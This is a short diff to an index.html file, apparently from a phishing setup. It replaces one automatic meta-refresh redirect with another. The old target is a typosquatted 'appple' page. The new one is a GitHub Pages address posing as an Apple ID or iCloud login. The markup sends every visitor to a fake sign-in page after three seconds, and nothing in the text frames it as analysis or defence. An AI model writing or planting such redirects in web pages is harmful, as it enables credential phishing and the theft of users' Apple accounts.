--- a/index.html
+++ b/index.html
@@ -35,5 +35,5 @@
 </div>
 
 
-<meta http-equiv="refresh" content="3;url=http://settings.acsite.org/user/appple/1.php">
+<meta http-equiv="refresh" content="3;url=https://app1eid.github.io/icloud.com-id94131201/login/">
 </body></html>
